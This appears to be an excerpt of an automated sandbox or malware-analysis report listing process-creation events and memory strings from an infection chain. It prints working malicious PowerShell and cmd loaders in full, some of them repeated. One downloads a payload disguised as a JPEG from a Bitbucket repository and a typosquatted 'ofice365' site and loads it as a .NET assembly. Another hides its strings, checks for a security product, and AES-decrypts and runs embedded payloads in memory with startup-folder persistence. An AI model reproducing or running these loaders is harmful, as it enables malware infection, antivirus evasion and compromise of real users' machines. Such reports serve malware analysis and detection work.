'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\mypayload.bat';$cvim='entfexgrypfexgoinfexgtfexg'.replace('fexg', ''),'eleixmomeixmontixmoaixmotixmo'.replace('ixmo', ''),'decoszeomoszeproszeeoszesoszesosze'.replace('osze', ''),'cpuxvoppuxvytpuxvopuxv'.replace('puxv', ''),'rywrpeaywrpdlywrpiywrpnesywrp'.replace('ywrp', ''),'cgarcrgarcegarcategarcdgarcecgarcrgarcypgarctgarcorgarc'.replace('garc', ''),'loivflaivfldivfl'.replace('ivfl', ''),'chagsqknggsqkeegsqkxtgsqkegsqknsgsqkiogsqkngsqk'.replace('gsqk', ''),'maaauaiaaaunaaaumodaaauulaaaueaaau'.replace('aaau', ''),'spojxflitojxf'.replace('ojxf', ''),'ifgbonvfgbookfgboefgbo'.replace('fgbo', ''),'gevsbgtcuvsbgrrvsbgevsbgntvsbgprvsbgovsbgcevsbgsvsbgsvsbg'.replace('vsbg', ''),'trusbuansusbuforusbumusbufiusbunausbulbusbulusbuockusbu'.replace('usbu', ''),'friyufoiyufmiyufbaiyufse6iyuf4stiyufriniyufgiyuf'.replace('iyuf', '');powershell -w hidden;$modules=[system.diagnostics.process]::($cvim[11])().modules;if ($modules -match 'hmpalert.dll') { exit; };function dsolp($wsuto){$fdrhp=[system.security.cryptography.aes]::create();$fdrhp.mode=[system.security.cryptography.ciphermode]::cbc;$fdrhp.padding=[system.security.cryptography.paddingmode]::pkcs7;$fdrhp.key=[system.convert]::($cvim[13])('0l3qu7et4bhk3wbvagfjicwz8cespcifojtqhmr81xg=');$fdrhp.iv=[system.convert]::($cvim[13])('jifnsdytrqtk8ftun6ogsw==');$qwyhd=$fdrhp.($cvim[5])();$funrp=$qwyhd.($cvim[12])($wsuto,0,$wsuto.length);$qwyhd.dispose();$fdrhp.dispose();$funrp;}function mmhqh($wsuto){$zzdvj=new-object system.io.memorystream(,$wsuto);$rzpai=new-object system.io.memorystream;$bbtac=new-object system.io.compression.gzipstream($zzdvj,[io.compression.compressionmode]::($cvim[2]));$bbtac.($cvim[3])($rzpai);$bbtac.dispose();$zzdvj.dispose();$rzpai.dispose();$rzpai.toarray();}$zledh=[system.io.file]::($cvim[4])([console]::title);$qkjpw=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 5).substring(2))));$gxzxu=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 6).substring(2))));[system.reflection.assembly]::($cvim[6])([byte[]]$gxzxu).($cvim[0]).($cvim[10])($null,$null);[system.reflection.assembly]::($cvim[6])([byte[]]$qkjpw).($cvim[0]).($cvim[10])($null,$null); "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\mypayload.bat';$cvim='entfexgrypfexgoinfexgtfexg'.replace('fexg', ''),'eleixmomeixmontixmoaixmotixmo'.replace('ixmo', ''),'decoszeomoszeproszeeoszesoszesosze'.replace('osze', ''),'cpuxvoppuxvytpuxvopuxv'.replace('puxv', ''),'rywrpeaywrpdlywrpiywrpnesywrp'.replace('ywrp', ''),'cgarcrgarcegarcategarcdgarcecgarcrgarcypgarctgarcorgarc'.replace('garc', ''),'loivflaivfldivfl'.replace('ivfl', ''),'chagsqknggsqkeegsqkxtgsqkegsqknsgsqkiogsqkngsqk'.replace('gsqk', ''),'maaauaiaaaunaaaumodaaauulaaaueaaau'.replace('aaau', ''),'spojxflitojxf'.replace('ojxf', ''),'ifgbonvfgbookfgboefgbo'.replace('fgbo', ''),'gevsbgtcuvsbgrrvsbgevsbgntvsbgprvsbgovsbgcevsbgsvsbgsvsbg'.replace('vsbg', ''),'trusbuansusbuforusbumusbufiusbunausbulbusbulusbuockusbu'.replace('usbu', ''),'friyufoiyufmiyufbaiyufse6iyuf4stiyufriniyufgiyuf'.replace('iyuf', '');powershell -w hidden;$modules=[system.diagnostics.process]::($cvim[11])().modules;if ($modules -match 'hmpalert.dll') { exit; };function dsolp($wsuto){$fdrhp=[system.security.cryptography.aes]::create();$fdrhp.mode=[system.security.cryptography.ciphermode]::cbc;$fdrhp.padding=[system.security.cryptography.paddingmode]::pkcs7;$fdrhp.key=[system.convert]::($cvim[13])('0l3qu7et4bhk3wbvagfjicwz8cespcifojtqhmr81xg=');$fdrhp.iv=[system.convert]::($cvim[13])('jifnsdytrqtk8ftun6ogsw==');$qwyhd=$fdrhp.($cvim[5])();$funrp=$qwyhd.($cvim[12])($wsuto,0,$wsuto.length);$qwyhd.dispose();$fdrhp.dispose();$funrp;}function mmhqh($wsuto){$zzdvj=new-object system.io.memorystream(,$wsuto);$rzpai=new-object system.io.memorystream;$bbtac=new-object system.io.compression.gzipstream($zzdvj,[io.compression.compressionmode]::($cvim[2]));$bbtac.($cvim[3])($rzpai);$bbtac.dispose();$zzdvj.dispose();$rzpai.dispose();$rzpai.toarray();}$zledh=[system.io.file]::($cvim[4])([console]::title);$qkjpw=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 5).substring(2))));$gxzxu=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 6).substring(2))));[system.reflection.assembly]::($cvim[6])([byte[]]$gxzxu).($cvim[0]).($cvim[10])($null,$null);[system.reflection.assembly]::($cvim[6])([byte[]]$qkjpw).($cvim[0]).($cvim[10])($null,$null); "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec

Source: Macromedia.com, 00000016.00000000.2395118003.00000000000D3000.00000002.00000001.01000000.0000000E.sdmp, Macromedia.com, 00000016.00000003.2407646479.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, AchillesGuard.com, 00000020.00000000.2430074052.0000000001093000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ae70ca0159.exe, 00000008.00000002.2336822937.00000000013CD000.00000040.00000001.01000000.0000000A.sdmp, ae70ca0159.exe, 0000002A.00000002.2832307852.00000000013CD000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: y2Program Manager
Source: ae70ca0159.exe	Binary or memory string: Xy2Program Manager
